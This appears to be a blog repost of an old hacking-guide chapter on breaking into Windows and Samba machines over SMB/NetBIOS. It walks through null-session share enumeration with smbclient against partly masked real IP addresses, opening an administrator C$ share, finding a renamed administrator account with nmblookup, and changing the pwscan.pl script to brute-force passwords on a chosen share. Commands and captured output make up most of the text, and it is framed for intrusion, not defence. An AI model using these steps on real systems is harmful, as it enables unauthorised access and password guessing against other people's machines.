SMB is used by Windows machines (and with SAMBA even Unix machines) to communicate. A lot can be done through an open NetBIOS port. The first thing is to try to find out what shares are advertised on the server. Some servers is not configured well and will revealing its shares without a username or password (using a NULL connection).
>smbclient -L 209.xxx.68.66 -n "justatest"
Password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 2.0.3]
Sharename Type Comment
--------- ---- -------
winshares Disk FreeBSD Samba Server
IPC$ IPC IPC Service (Samba 2.0.3)
Server Comment
--------- -------
FILES Samba 2.0.3
Workgroup Master
--------- -------
(Note the -n switch - we don't want to call the server with our server name, just in case you are running SAMBA yourself) As you can see we find some lovely information on the server - the workgroup/domain name, the description and the Windows version (above server was a SAMBA server actually). Nice...Of course with a known password, or a blank password things are much more fun- you can list all the shares or you might want to access a drive:
> smbclient \\\\208.xxx.198.71\\c$ -U administrator -n "justatest"
Password:
Domain=[xxx] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> ls
WINNT D 0 Fri Oct 8 23:24:02 1999
NTDETECT.COM AHSR 26816 Fri Aug 11 01:22:24 2000
ntldr AHSR 156496 Fri Aug 11 01:22:24 2000
boot.ini ASR 288 Sat Oct 9 00:30:56 1999
ffastun.ffo AH 208896 Fri Dec 29 00:35:34 2000
Program Files D 0 Fri Oct 8 23:28:10 1999
CONFIG.SYS A 0 Fri Oct 8 23:31:46 1999
AUTOEXEC.BAT A 0 Fri Oct 8 23:31:46 1999
IO.SYS AHSR 0 Fri Oct 8 23:31:46 1999
MSDOS.SYS AHSR 0 Fri Oct 8 23:31:46 1999
TEMP D 0 Fri Oct 8 23:31:50 1999
--cut--
You are now dropped into the smbclient "shell". From here you could do file transfers and the likes (see Chapter 6 - what now). You should really be able to figure out how "smbclient" works on your own...
You might also want to try to collect information with the "nmblookup" command - it helps sometimes to find the administrator username (if it was changed):
# nmblookup -A 160.124.19.99
Looking up status of 160.124.19.99
received 10 names
HUTSI <00> - B
SENSEPOST <00> -
HUTSI <20> - B
HUTSI <03> - B
SENSEPOST <1e> -
SENSEPOST <1d> - B
INet~Services <1c> -
..__MSBROWSE__. <01> -
IS~HUTSI <00> - B
BAAS <03> - B
Look at the entries marked <03>. Note "BAAS". "Baas" is the renamed administrator username. So, forget trying using "administrator" as a username.
You also want to have a look at VLAD (yet again). The pwscan.pl script does a good job of brute forcing NetBIOS (run it with switches -v and -B). The pwscan.pl script actually uses the "smbclient" command and inspects the output to find a valid username & password combination. If you want to brute a specific share, you will need to modify these lines (starting at line 610 in version 1.17):
$cmd = "smbclient";
$service = "//".$target."/ipc\$";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
to read something like $cmd = "smbclient";
$service = "//".$target."/sharename";
@args = ($service, "'".$pass."'",
"-U", $user);
$s = Expect->spawn($cmd, @args);
An excellent paper on NetBIOS and the CIFS protocol by Hobbit can be found at http://packetstorm.securify.com/docs/infosec/cifs.txt. You really should try to read it.
Added: you should really look at a tool called CIS by David Litchfield (nowadays with @stake) It does a lot of cool stuff – and it does wonders for SMB.
No comments:
Post a Comment
hacking tools